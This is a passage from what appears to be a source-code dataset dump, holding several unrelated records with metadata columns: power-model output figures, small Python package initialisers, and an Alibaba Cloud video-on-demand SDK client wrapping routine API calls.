'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 4.64781e-06,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00637402,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0716774,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.078056,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.7601,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 6.1691568649082935,
'Runtime Dynamic': 6.1691568649082935,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.302989,
'Runtime Dynamic': 0.0592488,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 80.0957,
'Peak Power': 113.208,
'Runtime Dynamic': 18.2866,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 79.7927,
'Total Cores/Runtime Dynamic': 18.2273,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.302989,
'Total L3s/Runtime Dynamic': 0.0592488,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.085339
| 124
| 0.682054
| 8,090
| 68,628
| 5.779975
| 0.067738
| 0.123524
| 0.112917
| 0.093413
| 0.939435
| 0.930368
| 0.917536
| 0.886762
| 0.862532
| 0.842237
| 0
| 0.131957
| 0.224267
| 68,628
| 914
| 125
| 75.085339
| 0.746379
| 0
| 0
| 0.642232
| 0
| 0
| 0.657229
| 0.048085
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ab7c83606b72dc22dd2cc94110e980988deb2d5a
| 145
|
py
|
Python
|
loldib/getratings/models/NA/na_brand/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_brand/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_brand/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from .na_brand_top import *
from .na_brand_jng import *
from .na_brand_mid import *
from .na_brand_bot import *
from .na_brand_sup import *
| 24.166667
| 28
| 0.758621
| 25
| 145
| 4
| 0.36
| 0.3
| 0.55
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 145
| 5
| 29
| 29
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ab8babb032e52016e59e64012fb813ea0a78ae77
| 178
|
py
|
Python
|
mamonsu/plugins/system/__init__.py
|
dan-aksenov/mamonsu
|
c4822b48974e870af91910515fd7f11e4b8b41b3
|
[
"BSD-3-Clause"
] | 188
|
2016-01-31T09:05:59.000Z
|
2022-03-22T16:49:12.000Z
|
mamonsu/plugins/system/__init__.py
|
dan-aksenov/mamonsu
|
c4822b48974e870af91910515fd7f11e4b8b41b3
|
[
"BSD-3-Clause"
] | 162
|
2016-02-02T13:49:14.000Z
|
2022-02-22T08:45:42.000Z
|
mamonsu/plugins/system/__init__.py
|
dan-aksenov/mamonsu
|
c4822b48974e870af91910515fd7f11e4b8b41b3
|
[
"BSD-3-Clause"
] | 46
|
2016-01-31T21:23:37.000Z
|
2022-02-07T10:59:54.000Z
|
import mamonsu.lib.platform as platform
if platform.LINUX:
__import__('mamonsu.plugins.system.linux')
if platform.WINDOWS:
__import__('mamonsu.plugins.system.windows')
| 22.25
| 48
| 0.775281
| 22
| 178
| 5.909091
| 0.454545
| 0.3
| 0.307692
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11236
| 178
| 7
| 49
| 25.428571
| 0.822785
| 0
| 0
| 0
| 0
| 0
| 0.325843
| 0.325843
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e60180cc48eae83c4059ded842771b9e9efe2aa2
| 85,338
|
py
|
Python
|
alibabacloud/clients/vod_20170321.py
|
wallisyan/alibabacloud-python-sdk-v2
|
6e024c97cded2403025a7dd8fea8261e41872156
|
[
"Apache-2.0"
] | 21
|
2018-12-20T07:34:13.000Z
|
2020-03-05T14:32:08.000Z
|
alibabacloud/clients/vod_20170321.py
|
wallisyan/alibabacloud-python-sdk-v2
|
6e024c97cded2403025a7dd8fea8261e41872156
|
[
"Apache-2.0"
] | 22
|
2018-12-21T13:22:33.000Z
|
2020-06-29T08:37:09.000Z
|
alibabacloud/clients/vod_20170321.py
|
wallisyan/alibabacloud-python-sdk-v2
|
6e024c97cded2403025a7dd8fea8261e41872156
|
[
"Apache-2.0"
] | 12
|
2018-12-29T05:45:55.000Z
|
2022-01-05T09:59:30.000Z
|
# Copyright 2019 Alibaba Cloud Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from alibabacloud.client import AlibabaCloudClient
from alibabacloud.request import APIRequest
from alibabacloud.utils.parameter_validation import verify_params
class VodClient(AlibabaCloudClient):
def __init__(self, client_config, credentials_provider=None, retry_policy=None,
endpoint_resolver=None):
AlibabaCloudClient.__init__(self, client_config,
credentials_provider=credentials_provider,
retry_policy=retry_policy,
endpoint_resolver=endpoint_resolver)
self.product_code = 'vod'
self.api_version = '2017-03-21'
self.location_service_code = 'vod'
self.location_endpoint_type = 'openAPI'
def modify_vod_domain_schdm_by_property(self, property_=None, domain_name=None, owner_id=None):
api_request = APIRequest('ModifyVodDomainSchdmByProperty', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"Property": property_,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_ai_video_tag_result(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
owner_id=None,
media_id=None):
api_request = APIRequest('GetAIVideoTagResult', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"OwnerId": owner_id,
"MediaId": media_id}
return self._handle_request(api_request).result
def get_upload_details(
self,
resource_owner_id=None,
resource_owner_account=None,
resource_real_owner_id=None,
media_ids=None,
owner_id=None,
media_type=None):
api_request = APIRequest('GetUploadDetails', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"MediaIds": media_ids,
"OwnerId": owner_id,
"MediaType": media_type}
return self._handle_request(api_request).result
def describe_vod_storage_data(
self,
start_time=None,
storage=None,
storage_type=None,
end_time=None,
owner_id=None,
region=None):
api_request = APIRequest('DescribeVodStorageData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"Storage": storage,
"StorageType": storage_type,
"EndTime": end_time,
"OwnerId": owner_id,
"Region": region}
return self._handle_request(api_request).result
def describe_vod_ai_data(
self,
start_time=None,
ai_type=None,
end_time=None,
owner_id=None,
region=None):
api_request = APIRequest('DescribeVodAIData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"AIType": ai_type,
"EndTime": end_time,
"OwnerId": owner_id,
"Region": region}
return self._handle_request(api_request).result
def describe_vod_transcode_data(
self,
start_time=None,
storage=None,
end_time=None,
specification=None,
owner_id=None,
region=None):
api_request = APIRequest('DescribeVodTranscodeData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"Storage": storage,
"EndTime": end_time,
"Specification": specification,
"OwnerId": owner_id,
"Region": region}
return self._handle_request(api_request).result
def delete_multipart_upload(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
resource_real_owner_id=None,
owner_id=None,
media_id=None,
media_type=None):
api_request = APIRequest('DeleteMultipartUpload', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"MediaId": media_id,
"MediaType": media_type}
return self._handle_request(api_request).result
def get_attached_media_info(
self,
resource_owner_id=None,
resource_owner_account=None,
output_type=None,
media_ids=None,
resource_real_owner_id=None,
owner_id=None,
auth_timeout=None):
api_request = APIRequest('GetAttachedMediaInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OutputType": output_type,
"MediaIds": media_ids,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"AuthTimeout": auth_timeout}
return self._handle_request(api_request).result
def delete_attached_media(
self,
resource_owner_id=None,
resource_owner_account=None,
media_ids=None,
owner_id=None):
api_request = APIRequest('DeleteAttachedMedia', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"MediaIds": media_ids,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_attached_media_infos(
self,
resource_owner_id=None,
update_content=None,
resource_owner_account=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('UpdateAttachedMediaInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"UpdateContent": update_content,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def attach_app_policy_to_identity(
self,
identity_name=None,
resource_owner_id=None,
identity_type=None,
resource_owner_account=None,
app_id=None,
policy_names=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('AttachAppPolicyToIdentity', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"IdentityName": identity_name,
"ResourceOwnerId": resource_owner_id,
"IdentityType": identity_type,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"PolicyNames": policy_names,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def detach_app_policy_from_identity(
self,
identity_name=None,
resource_owner_id=None,
identity_type=None,
resource_owner_account=None,
app_id=None,
policy_names=None,
owner_id=None):
api_request = APIRequest('DetachAppPolicyFromIdentity', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"IdentityName": identity_name,
"ResourceOwnerId": resource_owner_id,
"IdentityType": identity_type,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"PolicyNames": policy_names,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def list_app_policies_for_identity(
self,
identity_name=None,
resource_owner_id=None,
identity_type=None,
resource_owner_account=None,
app_id=None,
owner_id=None):
api_request = APIRequest('ListAppPoliciesForIdentity', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"IdentityName": identity_name,
"ResourceOwnerId": resource_owner_id,
"IdentityType": identity_type,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def create_app_info(
self,
resource_owner_id=None,
app_name=None,
resource_owner_account=None,
description=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('CreateAppInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"AppName": app_name,
"ResourceOwnerAccount": resource_owner_account,
"Description": description,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_app_infos(
self,
resource_owner_id=None,
app_ids=None,
resource_owner_account=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('GetAppInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"AppIds": app_ids,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_app_info(
self,
resource_owner_id=None,
app_name=None,
resource_owner_account=None,
app_id=None,
description=None,
resource_real_owner_id=None,
owner_id=None,
status=None):
api_request = APIRequest('UpdateAppInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"AppName": app_name,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"Description": description,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"Status": status}
return self._handle_request(api_request).result
def delete_app_info(
self,
resource_owner_id=None,
resource_owner_account=None,
app_id=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('DeleteAppInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def list_app_info(
self,
resource_owner_id=None,
resource_owner_account=None,
page_no=None,
page_size=None,
resource_real_owner_id=None,
owner_id=None,
status=None):
api_request = APIRequest('ListAppInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"PageNo": page_no,
"PageSize": page_size,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"Status": status}
return self._handle_request(api_request).result
def move_app_resource(
self,
target_app_id=None,
resource_owner_id=None,
resource_owner_account=None,
resource_real_owner_id=None,
owner_id=None,
resource_type=None,
resource_ids=None):
api_request = APIRequest('MoveAppResource', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"TargetAppId": target_app_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"ResourceType": resource_type,
"ResourceIds": resource_ids}
return self._handle_request(api_request).result
def delete_message_callback(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
app_id=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('DeleteMessageCallback', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"AppId": app_id,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_transcode_summary(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
video_ids=None):
api_request = APIRequest('GetTranscodeSummary', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"VideoIds": video_ids}
return self._handle_request(api_request).result
def list_transcode_task(
self,
resource_owner_id=None,
resource_owner_account=None,
page_no=None,
page_size=None,
end_time=None,
video_id=None,
start_time=None,
owner_id=None):
api_request = APIRequest('ListTranscodeTask', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"PageNo": page_no,
"PageSize": page_size,
"EndTime": end_time,
"VideoId": video_id,
"StartTime": start_time,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_transcode_task(
self,
resource_owner_id=None,
resource_owner_account=None,
transcode_task_id=None,
owner_id=None):
api_request = APIRequest('GetTranscodeTask', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TranscodeTaskId": transcode_task_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_url_upload_infos(
self,
resource_owner_id=None,
resource_owner_account=None,
job_ids=None,
upload_ur_ls=None,
owner_id=None):
api_request = APIRequest('GetURLUploadInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"JobIds": job_ids,
"UploadURLs": upload_ur_ls,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_transcode_template_group(
self,
transcode_template_list=None,
resource_owner_id=None,
resource_owner_account=None,
name=None,
owner_id=None,
locked=None,
transcode_template_group_id=None):
api_request = APIRequest('UpdateTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"TranscodeTemplateList": transcode_template_list,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Name": name,
"OwnerId": owner_id,
"Locked": locked,
"TranscodeTemplateGroupId": transcode_template_group_id}
return self._handle_request(api_request).result
def add_transcode_template_group(
self,
transcode_template_list=None,
resource_owner_id=None,
resource_owner_account=None,
app_id=None,
name=None,
owner_id=None,
transcode_template_group_id=None):
api_request = APIRequest('AddTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"TranscodeTemplateList": transcode_template_list,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"Name": name,
"OwnerId": owner_id,
"TranscodeTemplateGroupId": transcode_template_group_id}
return self._handle_request(api_request).result
def delete_transcode_template_group(
self,
resource_owner_id=None,
resource_owner_account=None,
transcode_template_ids=None,
owner_id=None,
transcode_template_group_id=None,
force_del_group=None):
api_request = APIRequest('DeleteTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TranscodeTemplateIds": transcode_template_ids,
"OwnerId": owner_id,
"TranscodeTemplateGroupId": transcode_template_group_id,
"ForceDelGroup": force_del_group}
return self._handle_request(api_request).result
def get_transcode_template_group(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
transcode_template_group_id=None):
api_request = APIRequest('GetTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"TranscodeTemplateGroupId": transcode_template_group_id}
return self._handle_request(api_request).result
def set_default_transcode_template_group(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
transcode_template_group_id=None):
api_request = APIRequest('SetDefaultTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"TranscodeTemplateGroupId": transcode_template_group_id}
return self._handle_request(api_request).result
def list_transcode_template_group(
self,
resource_owner_id=None,
resource_owner_account=None,
page_no=None,
app_id=None,
page_size=None,
owner_id=None):
api_request = APIRequest('ListTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"PageNo": page_no,
"AppId": app_id,
"PageSize": page_size,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_ai_media_audit_job(
self,
job_id=None,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None):
api_request = APIRequest('GetAIMediaAuditJob', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"JobId": job_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def submit_ai_media_audit_job(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
media_id=None,
template_id=None):
api_request = APIRequest('SubmitAIMediaAuditJob', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"MediaId": media_id,
"TemplateId": template_id}
return self._handle_request(api_request).result
def get_media_audit_result(
self,
resource_owner_id=None,
resource_owner_account=None,
resource_real_owner_id=None,
owner_id=None,
media_id=None):
api_request = APIRequest('GetMediaAuditResult', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"MediaId": media_id}
return self._handle_request(api_request).result
def get_media_audit_result_detail(
self,
resource_owner_id=None,
resource_owner_account=None,
page_no=None,
owner_id=None,
media_id=None):
api_request = APIRequest('GetMediaAuditResultDetail', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"PageNo": page_no,
"OwnerId": owner_id,
"MediaId": media_id}
return self._handle_request(api_request).result
def get_media_audit_result_timeline(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
media_id=None):
api_request = APIRequest('GetMediaAuditResultTimeline', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"MediaId": media_id}
return self._handle_request(api_request).result
def add_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_config=None,
template_type=None,
template_name=None,
owner_id=None):
api_request = APIRequest('AddAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateConfig": template_config,
"TemplateType": template_type,
"TemplateName": template_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def delete_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
template_id=None):
api_request = APIRequest('DeleteAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"TemplateId": template_id}
return self._handle_request(api_request).result
def update_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_config=None,
template_name=None,
owner_id=None,
template_id=None):
api_request = APIRequest('UpdateAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateConfig": template_config,
"TemplateName": template_name,
"OwnerId": owner_id,
"TemplateId": template_id}
return self._handle_request(api_request).result
def get_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
template_id=None):
api_request = APIRequest('GetAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"TemplateId": template_id}
return self._handle_request(api_request).result
def list_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_type=None,
owner_id=None):
api_request = APIRequest('ListAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateType": template_type,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_default_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_type=None,
owner_id=None):
api_request = APIRequest('GetDefaultAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateType": template_type,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def set_default_ai_template(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
template_id=None):
api_request = APIRequest('SetDefaultAITemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"TemplateId": template_id}
return self._handle_request(api_request).result
def describe_vod_domain_log(
self,
start_time=None,
page_number=None,
page_size=None,
domain_name=None,
end_time=None,
owner_id=None):
api_request = APIRequest('DescribeVodDomainLog', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"PageNumber": page_number,
"PageSize": page_size,
"DomainName": domain_name,
"EndTime": end_time,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_vod_domain_certificate_info(self, domain_name=None, owner_id=None):
api_request = APIRequest('DescribeVodDomainCertificateInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {"DomainName": domain_name, "OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_vod_domain_traffic_data(
self,
location_name_en=None,
start_time=None,
isp_name_en=None,
domain_name=None,
end_time=None,
owner_id=None,
interval=None):
api_request = APIRequest('DescribeVodDomainTrafficData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"LocationNameEn": location_name_en,
"StartTime": start_time,
"IspNameEn": isp_name_en,
"DomainName": domain_name,
"EndTime": end_time,
"OwnerId": owner_id,
"Interval": interval}
return self._handle_request(api_request).result
def describe_vod_domain_bps_data(
self,
location_name_en=None,
start_time=None,
isp_name_en=None,
domain_name=None,
end_time=None,
owner_id=None,
interval=None):
api_request = APIRequest('DescribeVodDomainBpsData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"LocationNameEn": location_name_en,
"StartTime": start_time,
"IspNameEn": isp_name_en,
"DomainName": domain_name,
"EndTime": end_time,
"OwnerId": owner_id,
"Interval": interval}
return self._handle_request(api_request).result
def describe_vod_domain_usage_data(
self,
start_time=None,
type_=None,
area=None,
domain_name=None,
end_time=None,
owner_id=None,
field=None):
api_request = APIRequest('DescribeVodDomainUsageData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"Type": type_,
"Area": area,
"DomainName": domain_name,
"EndTime": end_time,
"OwnerId": owner_id,
"Field": field}
return self._handle_request(api_request).result
def describe_vod_certificate_list(self, security_token=None, domain_name=None, owner_id=None):
api_request = APIRequest('DescribeVodCertificateList', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def batch_stop_vod_domain(self, security_token=None, domain_names=None, owner_id=None):
api_request = APIRequest('BatchStopVodDomain', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"DomainNames": domain_names,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def delete_vod_domain(
self,
security_token=None,
owner_account=None,
domain_name=None,
owner_id=None):
api_request = APIRequest('DeleteVodDomain', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"OwnerAccount": owner_account,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def set_vod_domain_certificate(
self,
security_token=None,
